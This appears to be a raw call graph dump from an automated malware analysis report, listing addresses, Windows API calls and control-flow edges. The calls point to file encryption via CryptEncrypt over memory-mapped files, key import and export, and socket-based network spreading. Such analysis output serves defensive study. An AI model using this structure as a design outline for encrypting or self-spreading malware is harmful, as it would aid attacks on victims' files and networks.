6297 2e51d95 CreateFileW 6296->6297 6298 2e51d87 Sleep 6296->6298 6299 2e51e3f 6297->6299 6300 2e51db9 WriteFile WriteFile WriteFile WriteFile WriteFile 6297->6300 6298->6297 6299->6293 6301 2e51e1a 6300->6301 6301->6301 6302 2e51e25 WriteFile CloseHandle 6301->6302 6302->6299 6304 2e518c7 GetFileSizeEx 6303->6304 6305 2e51951 6303->6305 6306 2e518da CreateFileMappingW 6304->6306 6305->6278 6308 2e518ff MapViewOfFile 6306->6308 6309 2e51948 FindCloseChangeNotification 6306->6309 6310 2e51913 CryptEncrypt 6308->6310 6311 2e5193f FindCloseChangeNotification 6308->6311 6309->6305 6312 2e5192e FlushViewOfFile 6310->6312 6313 2e51938 UnmapViewOfFile 6310->6313 6311->6309 6312->6313 6313->6311 6315 2e51bd0 LocalAlloc 6314->6315 6316 2e51c75 6314->6316 6315->6316 6317 2e51be9 CryptStringToBinaryW 6315->6317 6316->6289 6324 2e51c7f CryptExportKey 6316->6324 6318 2e51c6c LocalFree 6317->6318 6319 2e51bfe CryptDecodeObjectEx 6317->6319 6318->6316 6319->6318 6320 2e51c20 LocalAlloc 6319->6320 6320->6318 6321 2e51c32 CryptDecodeObjectEx 6320->6321 6322 2e51c63 LocalFree 6321->6322 6323 2e51c48 CryptImportKey 6321->6323 6322->6318 6323->6322 6325 2e51cac LocalAlloc 6324->6325 6326 2e51d2a 6324->6326 6325->6326 6327 2e51cbe CryptExportKey 6325->6327 6326->6289 6326->6292 6328 2e51d21 LocalFree 6327->6328 6329 2e51cd2 CryptBinaryToStringW 6327->6329 6328->6326 6329->6328 6330 2e51cee LocalAlloc 6329->6330 6330->6328 6331 2e51d02 CryptBinaryToStringW 6330->6331 6332 2e51d15 6331->6332 6333 2e51d1a LocalFree 6331->6333 6332->6328 6333->6328 6334->6296 6336 2e59319 6335->6336 6337 2e592a9 6335->6337 6336->5987 6337->6336 6338 2e592f2 VirtualProtect 6337->6338 6338->6337 6340 2e57245 6339->6340 6341 2e571e5 EnterCriticalSection 6339->6341 6340->6018 6340->6019 6340->6020 6342 2e5723d LeaveCriticalSection 6341->6342 6343 2e571f8 6341->6343 6342->6340 6344 2e57223 6343->6344 6346 2e56eda 6343->6346 6344->6342 6347 2e56ee3 6346->6347 6348 2e56efc 6346->6348 6347->6348 6349 2e56ee9 StrCmpIW 6347->6349 6348->6343 6349->6348 6350->6029 6359 2e5711f GetProcessHeap HeapAlloc 6351->6359 6353 2e56b20 wsprintfW 6355 2e56b1a 6353->6355 6354 2e56b9d 6354->6033 6355->6353 6355->6354 6356 2e56b62 StrCatW 6355->6356 6357 2e56b8d GetProcessHeap HeapFree 6355->6357 6365 2e57167 6356->6365 6357->6354 6360 2e5713d 6359->6360 6361 2e5715f 6359->6361 6362 2e57167 3 API calls 6360->6362 6361->6355 6363 2e5714e 6362->6363 6363->6361 6364 2e57152 GetProcessHeap HeapFree 6363->6364 6364->6361 6366 2e571d1 6365->6366 6369 2e57170 6365->6369 6366->6355 6367 2e57175 EnterCriticalSection 6367->6369 6368 2e571b0 LeaveCriticalSection 6368->6366 6368->6369 6369->6366 6369->6367 6369->6368 6370 2e571c4 Sleep 6369->6370 6370->6367 6372 2e596ef PathFindFileNameW 6371->6372 6380 2e57dae 6371->6380 6373 2e59702 WideCharToMultiByte inet_addr 6372->6373 6372->6380 6375 2e5974d 6373->6375 6377 2e5975d 6373->6377 6381 2e59683 gethostbyname 6375->6381 6377->6377 6384 2e5668a memset GetTickCount 6377->6384 6380->6043 6380->6047 6382 2e59696 wsprintfA 6381->6382 6383 2e596c0 6381->6383 6382->6383 6383->6377 6383->6380 6394 2e55a7e 6384->6394 6387 2e566e4 6469 2e52068 6387->6469 6388 2e566ed 6390 2e55a7e 82 API calls 6388->6390 6392 2e56715 6390->6392 6391 2e566e9 6391->6380 6393 2e52068 closesocket 6392->6393 6393->6391 6423 2e55a8f 6394->6423 6395 2e56727 5 API calls 6395->6423 6396 2e5631c 6396->6387 6396->6388 6397 2e520b2 GetTickCount 6397->6423 6400 2e56355 6877 2e531fb 6400->6877 6402 2e520d0 GetProcessHeap HeapFree 6402->6423 6404 2e52068 closesocket 6404->6396 6406 2e51000 GetProcessHeap HeapAlloc 6406->6423 6408 2e56384 6411 2e563cf 6408->6411 6412 2e563a9 6408->6412 6410 2e55a46 13 API calls 6410->6396 6413 2e520d0 2 API calls 6411->6413 6414 2e520d0 2 API calls 6412->6414 6416 2e56409 6413->6416 6415 2e5632d 6414->6415 6415->6410 6416->6415 6906 2e520ea 6416->6906 6419 2e55c7a rand 6590 2e5407b 6419->6590 6423->6395 6423->6396 6423->6397 6423->6400 6423->6402 6423->6406 6423->6408 6423->6415 6423->6419 6428 2e55ca4 6423->6428 6432 2e56324 6423->6432 6440 2e5632f 6423->6440 6457 2e55e28 Sleep 6423->6457 6473 2e52ef5 6423->6473 6489 2e52f88 6423->6489 6509 2e53061 6423->6509 6525 2e5330e 6423->6525 6560 2e535fa 6423->6560 6576 2e53ec8 6423->6576 6793 2e52547 6423->6793 6818 2e5688f 6423->6818 6823 2e5243f 6423->6823 6826 2e53b5d 6423->6826 6426 2e56641 6426->6415 6428->6415 6428->6423 6428->6426 6429 2e52068 closesocket 6428->6429 6459 2e52ef5 16 API calls 6428->6459 6460 2e56727 socket ioctlsocket htons inet_addr connect 6428->6460 6461 2e560de Sleep 6428->6461 6463 2e52f88 17 API calls 6428->6463 6464 2e56145 closesocket 6428->6464 6465 2e53ca0 8 API calls 6428->6465 6466 2e56228 closesocket 6428->6466 6623 2e542df 6428->6623 6647 2e5489c 6428->6647 6690 2e54ba1 6428->6690 6698 2e551f3 6428->6698 6711 2e55333 6428->6711 6843 2e5369d 6428->6843 6859 2e53c0a 6428->6859 6869 2e55a46 6428->6869 6431 2e562f1 Sleep 6429->6431 6430 2e564db 6433 2e564f2 memcpy memcpy 6430->6433 6437 2e5660f 6430->6437 6431->6423 6874 2e520d0 6432->6874 6438 2e520d0 2 API calls 6433->6438 6439 2e520d0 2 API calls 6437->6439 6452 2e56530 6438->6452 6439->6415 6443 2e520d0 2 API calls 6440->6443 6441 2e565a5 Sleep 6445 2e565ef 6441->6445 6446 2e565b8 6441->6446 6447 2e56338 6443->6447 6451 2e520d0 2 API calls 6445->6451 6449 2e53dd7 17 API calls 6446->6449 6450 2e520d0 2 API calls 6447->6450 6454 2e565eb 6449->6454 6450->6415 6451->6415 6452->6437 6452->6441 6914 2e53dd7 6452->6914 6454->6437 6454->6445 6839 2e56727 socket ioctlsocket 6457->6839 6459->6428 6460->6428 6462 2e52ef5 16 API calls 6461->6462 6462->6428 6463->6428 6464->6428 6465->6428 6466->6428 6470 2e5206f 6469->6470 6471 2e52075 closesocket 6470->6471 6472 2e52085 6470->6472 6471->6470 6472->6391 6930 2e5270a 6473->6930 6476 2e52f1b 6476->6423 6478 2e52f2c 6479 2e52f35 6478->6479 6480 2e52f47 6478->6480 6482 2e520d0 2 API calls 6479->6482 6481 2e5688f 3 API calls 6480->6481 6483 2e52f58 6481->6483 6482->6476 6484 2e52f68 6483->6484 6485 2e5243f 5 API calls 6483->6485 6486 2e520d0 2 API calls 6484->6486 6485->6484 6487 2e52f77 6486->6487 6488 2e520d0 2 API calls 6487->6488 6488->6476 6966 2e528b5 6489->6966 6493 2e52fc9 6494 2e52fe4 6493->6494 6495 2e52fd2 6493->6495 6497 2e5688f 3 API calls 6494->6497 6496 2e520d0 2 API calls 6495->6496 6498 2e52fb8 6496->6498 6499 2e52ff5 6497->6499 6498->6423 6500 2e5243f 5 API calls 6499->6500 6508 2e53009 6499->6508 6502 2e53005 6500->6502 6501 2e520d0 2 API calls 6503 2e53014 6501->6503 6502->6508 6995 2e51000 GetProcessHeap HeapAlloc 6502->6995 6504 2e520d0 2 API calls 6503->6504 6504->6498 6506 2e5303c 6507 2e53045 memcpy 6506->6507 6506->6508 6507->6508 6508->6501 7006 2e529ce 6509->7006 6512 2e53087 6512->6423 6514 2e53098 6515 2e530a1 6514->6515 6516 2e530b3 6514->6516 6517 2e520d0 2 API calls 6515->6517 6518 2e5688f 3 API calls 6516->6518 6517->6512 6519 2e530c4 6518->6519 6520 2e530d4 6519->6520 6521 2e5243f 5 API calls 6519->6521 6522 2e520d0 2 API calls 6520->6522 6521->6520 6523 2e530e3 6522->6523 6524 2e520d0 2 API calls 6523->6524 6524->6512 7036 2e52ccf 6525->7036 6528 2e52466 3 API calls 6529 2e53361 6528->6529 6543 2e5336a 6529->6543 7042 2e51000 GetProcessHeap HeapAlloc 6529->7042 6531 2e533e0 6535 2e5688f 3 API calls 6531->6535 6551 2e533e9 6531->6551 6533 2e520d0 2 API calls 6536 2e53335 6533->6536 6534 2e5337a 6538 2e53381 6534->6538 6539 2e5338e memcpy 6534->6539 6545 2e53404 6535->6545 6541 2e533c3 6536->6541 7043 2e51000 GetProcessHeap HeapAlloc 6536->7043 6537 2e520d0 2 API calls 6537->6541 6542 2e520d0 2 API calls 6538->6542 6540 2e520d0 2 API calls 6539->6540 6546 2e533b1 6540->6546 6541->6423 6542->6543 6543->6533 6544 2e53418 6549 2e520d0 2 API calls 6544->6549 6545->6544 6547 2e5243f 5 API calls 6545->6547 6548 2e520d0 2 API calls 6546->6548 6550 2e53414 6547->6550 6548->6536 6549->6551 6550->6544 6552 2e53422 6550->6552 6551->6537 7044 2e51000 GetProcessHeap HeapAlloc 6552->7044 6554 2e5342f 6555 2e53452 memcpy 6554->6555 6556 2e53438 6554->6556 6555->6556 6557 2e520d0 2 API calls 6556->6557 6558 2e53443 6557->6558 6559 2e520d0 2 API calls 6558->6559 6559->6541 7046 2e52c1e 6560->7046 6563 2e53630 6563->6423 6565 2e53641 6566 2e5365c 6565->6566 6567 2e5364a 6565->6567 6569 2e5688f 3 API calls 6566->6569 6568 2e520d0 2 API calls 6567->6568 6568->6563 6570 2e5366d 6569->6570 6571 2e5367d 6570->6571 6572 2e5243f 5 API calls 6570->6572 6573 2e520d0 2 API calls 6571->6573 6572->6571 6574 2e5368c 6573->6574 6575 2e520d0 2 API calls 6574->6575 6575->6563 6577 2e53ed6 6576->6577 6579 2e53f07 6577->6579 6580 2e53f0e 6577->6580 7069 2e53734 6577->7069 6579->6423 6581 2e535fa 14 API calls 6580->6581 6582 2e53f37 6581->6582 6582->6579 7098 2e51000 GetProcessHeap HeapAlloc 6582->7098 6584 2e53f70 6584->6579 6585 2e54030 rand 6584->6585 6585->6585 6586 2e54044 6585->6586 7099 2e53863 6586->7099 6589 2e520d0 2 API calls 6589->6579 6591 2e53061 16 API calls 6590->6591 6592 2e540a1 6591->6592 6595 2e540a5 6592->6595 7144 2e51000 GetProcessHeap HeapAlloc 6592->7144 6594 2e540b8 6594->6595 7145 2e51000 GetProcessHeap HeapAlloc 6594->7145 6595->6428 6597 2e540d7 6598 2e54242 6597->6598 6599 2e52c1e 6 API calls 6597->6599 6600 2e520d0 2 API calls 6598->6600 6607 2e5411e 6599->6607 6600->6595 6601 2e5412f memcpy 6602 2e520d0 2 API calls 6601->6602 6602->6607 6603 2e520d0 2 API calls 6603->6598 6604 2e52c1e 6 API calls 6604->6607 6605 2e5417f memcpy 6606 2e520d0 2 API calls 6605->6606 6606->6607 6607->6601 6607->6604 6607->6605 6608 2e5688f 3 API calls 6607->6608 6609 2e5423a 6607->6609 6611 2e5243f 5 API calls 6607->6611 6612 2e54247 6607->6612 6615 2e54125 6607->6615 6608->6607 6610 2e520d0 2 API calls 6609->6610 6610->6598 6611->6607 7146 2e530fe 6612->7146 6615->6603 6616 2e54275 6617 2e520d0 2 API calls 6616->6617 6618 2e5427a 6617->6618 6619 2e520d0 2 API calls 6618->6619 6620 2e54282 Sleep 6619->6620 6621 2e5429d 6620->6621 6621->6595 6622 2e535fa 14 API calls 6621->6622 6622->6621 7178 2e51000 GetProcessHeap HeapAlloc 6623->7178 6625 2e542ef 6626 2e54302 rand 6625->6626 6627 2e542fa 6625->6627 6628 2e52c1e 6 API calls 6626->6628 6627->6428 6646 2e5434c 6628->6646 6629 2e547f2 6630 2e520d0 2 API calls 6629->6630 6631 2e5480e 6630->6631 6633 2e520d0 2 API calls 6631->6633 6632 2e547ea 6634 2e520d0 2 API calls 6632->6634 6633->6627 6634->6629 6635 2e5438b memcpy 6635->6646 6636 2e547e2 6639 2e520d0 2 API calls 6636->6639 6637 2e543db memcpy 6640 2e520d0 2 API calls 6637->6640 6638 2e51000 GetProcessHeap HeapAlloc 6638->6646 6639->6632 6640->6646 6641 2e5688f 3 API calls 6641->6646 6642 2e5243f 5 API calls 6642->6646 6643 2e520d0 GetProcessHeap HeapFree 6643->6646 6645 2e52c1e 6 API calls 6645->6646 6646->6629 6646->6632 6646->6635 6646->6636 6646->6637 6646->6638 6646->6641 6646->6642 6646->6643 6646->6645 7179 2e53986 6646->7179 6648 2e52c1e 6 API calls 6647->6648 6649 2e548d8 6648->6649 6689 2e548df 6649->6689 7225 2e51000 GetProcessHeap HeapAlloc 6649->7225 6651 2e520d0 2 API calls 6652 2e54a04 6651->6652 6659 2e520d0 2 API calls 6652->6659 6653 2e54922 memcpy 6664 2e54905 6653->6664 6654 2e52c1e 6 API calls 6654->6664 6655 2e5499f 7226 2e51000 GetProcessHeap HeapAlloc 6655->7226 6656 2e5496f memcpy 6660 2e520d0 2 API calls 6656->6660 6657 2e549ca 6662 2e520d0 2 API calls 6657->6662 6663 2e54a11 6659->6663 6660->6664 6661 2e549a9 6661->6657 6665 2e549b0 6661->6665 6679 2e549d2 6662->6679 7227 2e51000 GetProcessHeap HeapAlloc 6663->7227 6664->6653 6664->6654 6664->6655 6664->6656 6664->6657 6664->6679 6667 2e5688f 3 API calls 6665->6667 6670 2e549c0 6667->6670 6668 2e54a1c 6669 2e53863 15 API calls 6668->6669 6668->6689 6673 2e54a47 6669->6673 6671 2e549c4 6670->6671 6672 2e5243f 5 API calls 6670->6672 6675 2e520d0 2 API calls 6671->6675 6672->6671 6674 2e520d0 2 API calls 6673->6674 6676 2e54a52 6674->6676 6677 2e549ed 6675->6677 6676->6689 7228 2e54820 6676->7228 6678 2e520d0 2 API calls 6677->6678 6678->6679 6679->6651 6679->6652 6683 2e54aae 6684 2e53986 16 API calls 6683->6684 6685 2e54adc 6684->6685 6686 2e520d0 2 API calls 6685->6686 6687 2e54ae3 6686->6687 6688 2e520d0 2 API calls 6687->6688 6688->6689 6689->6428 6691 2e54bb7 6690->6691 7237 2e51000 GetProcessHeap HeapAlloc 6691->7237 6693 2e54bd6 6697 2e54bdd 6693->6697 7238 2e54afe 6693->7238 6696 2e520d0 2 API calls 6696->6697 6697->6428 6699 2e5520e 6698->6699 7244 2e54c1c 6699->7244 6701 2e520d0 2 API calls 6709 2e55255 6701->6709 6702 2e55248 6703 2e552a0 6702->6703 6705 2e5524d 6702->6705 6704 2e520d0 2 API calls 6703->6704 6706 2e552a8 6704->6706 6705->6701 7299 2e550e0 6706->7299 6709->6428 6710 2e550e0 18 API calls 6710->6709 6712 2e53734 14 API calls 6711->6712 6713 2e5535b 6712->6713 6714 2e55598 6713->6714 7321 2e51000 GetProcessHeap HeapAlloc 6713->7321 6714->6428 6716 2e5536b 6716->6714 6717 2e54afe 16 API calls 6716->6717 6718 2e553c5 6717->6718 6719 2e520d0 2 API calls 6718->6719 6720 2e553d0 6719->6720 6720->6714 6721 2e554de 6720->6721 7322 2e51000 GetProcessHeap HeapAlloc 6720->7322 6721->6714 7324 2e51000 GetProcessHeap HeapAlloc 6721->7324 6724 2e554ef 6724->6714 6725 2e54afe 16 API calls 6724->6725 6727 2e55531 6725->6727 6726 2e5540e 6726->6714 6728 2e54afe 16 API calls 6726->6728 6729 2e520d0 2 API calls 6727->6729 6731 2e55474 6728->6731 6730 2e5553c 6729->6730 6730->6714 6734 2e555db 6730->6734 7325 2e51000 GetProcessHeap HeapAlloc 6730->7325 6732 2e520d0 2 API calls 6731->6732 6733 2e5547f 6732->6733 6733->6714 7323 2e51000 GetProcessHeap HeapAlloc 6733->7323 6734->6714 6735 2e5562f 6734->6735 7326 2e51000 GetProcessHeap HeapAlloc 6734->7326 6735->6714 7327 2e51000 GetProcessHeap HeapAlloc 6735->7327 6739 2e55556 6739->6714 6744 2e54afe 16 API calls 6739->6744 6741 2e55499 6741->6714 6745 2e54afe 16 API calls 6741->6745 6742 2e555f1 6742->6714 6746 2e54afe 16 API calls 6742->6746 6743 2e55664 6743->6714 6748 2e54afe 16 API calls 6743->6748 6747 2e5558b 6744->6747 6749 2e554d3 6745->6749 6750 2e55624 6746->6750 6751 2e555a0 6747->6751 6752 2e55590 6747->6752 6753 2e5569b 6748->6753 6755 2e520d0 2 API calls 6749->6755 6756 2e520d0 2 API calls 6750->6756 6758 2e54afe 16 API calls 6751->6758 6757 2e520d0 2 API calls 6752->6757 6754 2e520d0 2 API calls 6753->6754 6759 2e556a5 6754->6759 6755->6721 6756->6735 6757->6714 6760 2e555d0 6758->6760 6759->6714 7328 2e51000 GetProcessHeap HeapAlloc 6759->7328 6761 2e520d0 2 API calls 6760->6761 6761->6734 6763 2e556bf 6763->6714 6764 2e53986 16 API calls 6763->6764 6765 2e556fe 6764->6765 6766 2e520d0 2 API calls 6765->6766 6767 2e55705 6766->6767 6767->6714 6768 2e54c1c 17 API calls 6767->6768 6769 2e5574a 6768->6769 6770 2e520d0 2 API calls 6769->6770 6771 2e557b3 6770->6771 7329 2e51000 GetProcessHeap HeapAlloc 6771->7329 6773 2e557ef 6773->6714 6774 2e54afe 16 API calls 6773->6774 6775 2e558ad 6774->6775 6776 2e520d0 2 API calls 6775->6776 6777 2e558b7 6776->6777 6777->6714 6778 2e54820 16 API calls 6777->6778 6780 2e558f9 6777->6780 6778->6780 6779 2e55975 6779->6714 6782 2e54820 16 API calls 6779->6782 6780->6714 6780->6779 6781 2e54820 16 API calls 6780->6781 6781->6779 6783 2e559da 6782->6783 6783->6714 7330 2e51000 GetProcessHeap HeapAlloc 6783->7330 6785 2e559e8 6785->6714 7331 2e51000 GetProcessHeap HeapAlloc 6785->7331 6787 2e559f9 6787->6714 6788 2e5330e 16 API calls 6787->6788 6789 2e55a2c 6788->6789 6790 2e520d0 2 API calls 6789->6790 6791 2e55a36 6790->6791 6792 2e520d0 2 API calls 6791->6792 6792->6714 7332 2e51000 GetProcessHeap HeapAlloc 6793->7332 6795 2e5255b 6812 2e52564 6795->6812 7333 2e524d0 6795->7333 6798 2e5257f 6801 2e520d0 2 API calls 6798->6801 6799 2e52589 6800 2e52466 3 API calls 6799->6800 6802 2e525b2 6800->6802 6801->6812 6803 2e525d2 6802->6803 6804 2e525b9 6802->6804 7339 2e51000 GetProcessHeap HeapAlloc 6803->7339 6805 2e520d0 2 API calls 6804->6805 6807 2e525c1 6805->6807 6809 2e520d0 2 API calls 6807->6809 6808 2e525db 6810 2e525e2 6808->6810 6811 2e525fe memcpy 6808->6811 6809->6812 6813 2e520d0 2 API calls 6810->6813 6811->6810 6812->6423 6814 2e525ea 6813->6814 6815 2e520d0 2 API calls 6814->6815 6816 2e525f2 6815->6816 6817 2e520d0 2 API calls 6816->6817 6817->6812 6819 2e568a0 memset select 6818->6819 6820 2e5690e 6818->6820 6819->6820 6821 2e568f0 6819->6821 6820->6423 6821->6820 6822 2e568f4 send 6821->6822 6822->6820 7341 2e567af memset select 6823->7341 7348 2e51000 GetProcessHeap HeapAlloc 6826->7348 6828 2e53b6d 6829 2e53b76 6828->6829 6830 2e53b7b memset 6828->6830 6829->6423 6833 2e53bab 6830->6833 6832 2e53bfd 6834 2e520d0 2 API calls 6832->6834 6833->6832 6835 2e53bd7 6833->6835 7349 2e53469 6833->7349 6834->6829 6836 2e520d0 2 API calls 6835->6836 6837 2e53bdf 6836->6837 6838 2e5369d 13 API calls 6837->6838 6838->6829 6840 2e56757 6839->6840 6841 2e5675c 6839->6841 6840->6428 6841->6840 6842 2e56762 htons inet_addr connect 6841->6842 6842->6840 7390 2e52620 6843->7390 6847 2e536d8 6848 2e536e1 6847->6848 6849 2e536f3 6847->6849 6850 2e520d0 2 API calls 6848->6850 6851 2e5688f 3 API calls 6849->6851 6852 2e536c7 6850->6852 6853 2e53704 6851->6853 6852->6428 6854 2e53714 6853->6854 6855 2e5243f 5 API calls 6853->6855 6856 2e520d0 2 API calls 6854->6856 6855->6854 6857 2e53723 6856->6857 6858 2e520d0 2 API calls 6857->6858 6858->6852 7414 2e51000 GetProcessHeap HeapAlloc 6859->7414 6861 2e53c19 6862 2e53c27 memset 6861->6862 6868 2e53c22 6861->6868 6863 2e53c39 6862->6863 6863->6863 6864 2e53c4e memset 6863->6864 6865 2e53469 15 API calls 6864->6865 6866 2e53c84 6865->6866 6867 2e520d0 2 API calls 6866->6867 6867->6868 6868->6428 6870 2e530fe 13 API calls 6869->6870 6871 2e55a60 6870->6871 6872 2e531fb 13 API calls 6871->6872 6873 2e55a77 6872->6873 6873->6428 6875 2e520d6 GetProcessHeap HeapFree 6874->6875 6876 2e520e9 6874->6876 6875->6876 6876->6415 7415 2e51000 GetProcessHeap HeapAlloc 6877->7415 6879 2e5320c 6880 2e5322a 6879->6880 6881 2e52466 3 API calls 6879->6881 6882 2e532a5 6880->6882 7417 2e51000 GetProcessHeap HeapAlloc 6880->7417 6883 2e53250 6881->6883 6882->6404 6884 2e53257 6883->6884 7416 2e51000 GetProcessHeap HeapAlloc 6883->7416 6888 2e520d0 2 API calls 6884->6888 6886 2e532b9 6889 2e532c2 6886->6889 6890 2e532cc 6886->6890 6888->6880 6892 2e520d0 2 API calls 6889->6892 6895 2e5688f 3 API calls 6890->6895 6891 2e53267 6893 2e5326d 6891->6893 6894 2e5327a 6891->6894 6892->6882 6896 2e520d0 2 API calls 6893->6896 6898 2e520d0 2 API calls 6894->6898 6897 2e532de 6895->6897 6896->6884 6899 2e532ee 6897->6899 6901 2e5243f 5 API calls 6897->6901 6900 2e53296 6898->6900 6903 2e520d0 2 API calls 6899->6903 6902 2e520d0 2 API calls 6900->6902 6901->6899 6902->6880 6904 2e532fd 6903->6904 6905 2e520d0 2 API calls 6904->6905 6905->6882 6907 2e52102 FindResourceW 6906->6907 6912 2e52121 6906->6912 6908 2e52116 6907->6908 6907->6912 6909 2e585d0 13 API calls 6908->6909 6909->6912 6911 2e52129 6911->6415 6913 2e51000 GetProcessHeap HeapAlloc 6911->6913 6912->6911 7418 2e51000 GetProcessHeap HeapAlloc 6912->7418 6913->6430 6915 2e53de3 6914->6915 6916 2e53deb 6914->6916 6915->6452 7419 2e51000 GetProcessHeap HeapAlloc 6916->7419 6918 2e53e00 memcpy 6919 2e53e37 6918->6919 6920 2e5330e 16 API calls 6919->6920 6921 2e53e87 6920->6921 6922 2e53ea1 6921->6922 6923 2e53e8c 6921->6923 6925 2e520d0 2 API calls 6922->6925 6924 2e520d0 2 API calls 6923->6924 6926 2e53e94 6924->6926 6927 2e53ea9 6925->6927 6928 2e520d0 2 API calls 6926->6928 6929 2e520d0 2 API calls 6927->6929 6928->6915 6929->6915 6957 2e51000 GetProcessHeap HeapAlloc 6930->6957 6932 2e5271b 6933 2e52728 memcpy 6932->6933 6955 2e527b4 6932->6955 6934 2e5273d 6933->6934 6934->6934 6958 2e51000 GetProcessHeap HeapAlloc 6934->6958 6936 2e5274c 6937 2e52757 memcpy 6936->6937 6938 2e52752 6936->6938 6937->6938 6939 2e527ac 6938->6939 6959 2e52466 6938->6959 6940 2e520d0 2 API calls 6939->6940 6940->6955 6943 2e527a4 6946 2e520d0 2 API calls 6943->6946 6944 2e527bd 6964 2e51000 GetProcessHeap HeapAlloc 6944->6964 6946->6939 6947 2e527c6 6948 2e527cc 6947->6948 6949 2e527e8 memcpy 6947->6949 6950 2e520d0 2 API calls 6948->6950 6949->6948 6951 2e527d4 6950->6951 6952 2e520d0 2 API calls 6951->6952 6953 2e527dc 6952->6953 6954 2e520d0 2 API calls 6953->6954 6954->6955 6955->6476 6956 2e51000 GetProcessHeap HeapAlloc 6955->6956 6956->6478 6957->6932 6958->6936 6965 2e51000 GetProcessHeap HeapAlloc 6959->6965 6961 2e52471 6962 2e52477 htons 6961->6962 6963 2e524cb 6961->6963 6962->6963 6963->6943 6963->6944 6964->6947 6965->6961 6967 2e528c2 6966->6967 6968 2e528f1 6967->6968 6969 2e528dc 6967->6969 6993 2e528c7 6967->6993 6971 2e528e5 6968->6971 6997 2e51000 GetProcessHeap HeapAlloc 6968->6997 6996 2e51000 GetProcessHeap HeapAlloc 6969->6996 6971->6993 6998 2e52802 6971->6998 6974 2e528ff 6976 2e52906 memcpy 6974->6976 6974->6993 6976->6971 6977 2e52970 6979 2e520d0 2 API calls 6977->6979 6978 2e52466 3 API calls 6980 2e5295f 6978->6980 6979->6993 6981 2e52981 6980->6981 6982 2e52968 6980->6982 7004 2e51000 GetProcessHeap HeapAlloc 6981->7004 6983 2e520d0 2 API calls 6982->6983 6983->6977 6985 2e5298a 6986 2e52991 6985->6986 6987 2e529af memcpy 6985->6987 6988 2e520d0 2 API calls 6986->6988 6987->6986 6989 2e5299b 6988->6989 6990 2e520d0 2 API calls 6989->6990 6991 2e529a3 6990->6991 6992 2e520d0 2 API calls 6991->6992 6992->6993 6993->6498 6994 2e51000 GetProcessHeap HeapAlloc 6993->6994 6994->6493 6995->6506 6996->6971 6997->6974 6999 2e5280a 6998->6999 7002 2e52810 6999->7002 7005 2e51000 GetProcessHeap HeapAlloc 6999->7005 7001 2e52834 7001->7002 7003 2e52898 memcpy 7001->7003 7002->6977 7002->6978 7003->7002 7004->6985 7005->7001 7033 2e51000 GetProcessHeap HeapAlloc 7006->7033 7008 2e529df 7009 2e529ec memcpy 7008->7009 7019 2e52a91 7008->7019 7010 2e52a01 7009->7010 7034 2e51000 GetProcessHeap HeapAlloc 7010->7034 7012 2e52a10 7013 2e52a16 7012->7013 7014 2e52a1b memcpy 7012->7014 7015 2e52a89 7013->7015 7017 2e52466 3 API calls 7013->7017 7014->7013 7016 2e520d0 2 API calls 7015->7016 7016->7019 7018 2e52a78 7017->7018 7020 2e52a81 7018->7020 7021 2e52a9a 7018->7021 7019->6512 7032 2e51000 GetProcessHeap HeapAlloc 7019->7032 7022 2e520d0 2 API calls 7020->7022 7035 2e51000 GetProcessHeap HeapAlloc 7021->7035 7022->7015 7024 2e52aa3 7025 2e52ac5 memcpy 7024->7025 7026 2e52aa9 7024->7026 7025->7026 7027 2e520d0 2 API calls 7026->7027 7028 2e52ab1 7027->7028 7029 2e520d0 2 API calls 7028->7029 7030 2e52ab9 7029->7030 7031 2e520d0 2 API calls 7030->7031 7031->7019 7032->6514 7033->7008 7034->7012 7035->7024 7037 2e52cdb 7036->7037 7038 2e52ce1 7037->7038 7045 2e51000 GetProcessHeap HeapAlloc 7037->7045 7038->6528 7038->6536 7040 2e52cfe 7040->7038 7041 2e52d67 memcpy 7040->7041 7041->7038 7042->6534 7043->6531 7044->6554 7045->7040 7063 2e52adf 7046->7063 7049 2e52466 3 API calls 7050 2e52c67 7049->7050 7058 2e52c6e 7050->7058 7067 2e51000 GetProcessHeap HeapAlloc 7050->7067 7052 2e52c7c 7054 2e52c97 memcpy 7052->7054 7055 2e52c83 7052->7055 7053 2e520d0 2 API calls 7061 2e52c93 7053->7061 7057 2e520d0 2 API calls 7054->7057 7056 2e520d0 2 API calls 7055->7056 7056->7058 7059 2e52cbd 7057->7059 7058->7053 7060 2e520d0 2 API calls 7059->7060 7060->7061 7061->6563 7062 2e51000 GetProcessHeap HeapAlloc 7061->7062 7062->6565 7064 2e52af6 7063->7064 7068 2e51000 GetProcessHeap HeapAlloc 7064->7068 7066 2e52b0f 7066->7049 7066->7061 7067->7052 7068->7066 7128 2e52d82 7069->7128 7072 2e53752 7075 2e537e3 7072->7075 7133 2e51000 GetProcessHeap HeapAlloc 7072->7133 7073 2e52466 3 API calls 7074 2e53781 7073->7074 7076 2e5378a 7074->7076 7132 2e51000 GetProcessHeap HeapAlloc 7074->7132 7075->6577 7080 2e520d0 2 API calls 7076->7080 7078 2e537f7 7081 2e53800 7078->7081 7082 2e5380a 7078->7082 7080->7072 7084 2e520d0 2 API calls 7081->7084 7087 2e5688f 3 API calls 7082->7087 7083 2e5379a 7085 2e537a1 7083->7085 7086 2e537ae memcpy 7083->7086 7084->7075 7088 2e520d0 2 API calls 7085->7088 7090 2e520d0 2 API calls 7086->7090 7089 2e5381b 7087->7089 7088->7076 7092 2e5243f 5 API calls 7089->7092 7097 2e5382b 7089->7097 7091 2e537d1 7090->7091 7093 2e520d0 2 API calls 7091->7093 7092->7097 7093->7072 7094 2e520d0 2 API calls 7095 2e5383a 7094->7095 7096 2e520d0 2 API calls 7095->7096 7096->7075 7097->7094 7098->6584 7135 2e52e30 7099->7135 7102 2e5388d 7104 2e5391d 7102->7104 7142 2e51000 GetProcessHeap HeapAlloc 7102->7142 7103 2e52466 3 API calls 7105 2e538bc 7103->7105 7104->6589 7106 2e538c5 7105->7106 7141 2e51000 GetProcessHeap HeapAlloc 7105->7141 7110 2e520d0 2 API calls 7106->7110 7108 2e53931 7111 2e53944 7108->7111 7112 2e5393a 7108->7112 7110->7102 7117 2e5688f 3 API calls 7111->7117 7114 2e520d0 2 API calls 7112->7114 7113 2e538d8 7115 2e538de 7113->7115 7116 2e538eb memcpy 7113->7116 7114->7104 7118 2e520d0 2 API calls 7115->7118 7120 2e520d0 2 API calls 7116->7120 7119 2e53956 7117->7119 7118->7106 7122 2e53966 7119->7122 7124 2e5243f 5 API calls 7119->7124 7121 2e5390e 7120->7121 7123 2e520d0 2 API calls 7121->7123 7125 2e520d0 2 API calls 7122->7125 7123->7102 7124->7122 7126 2e53975 7125->7126 7127 2e520d0 2 API calls 7126->7127 7127->7104 7129 2e52d96 7128->7129 7134 2e51000 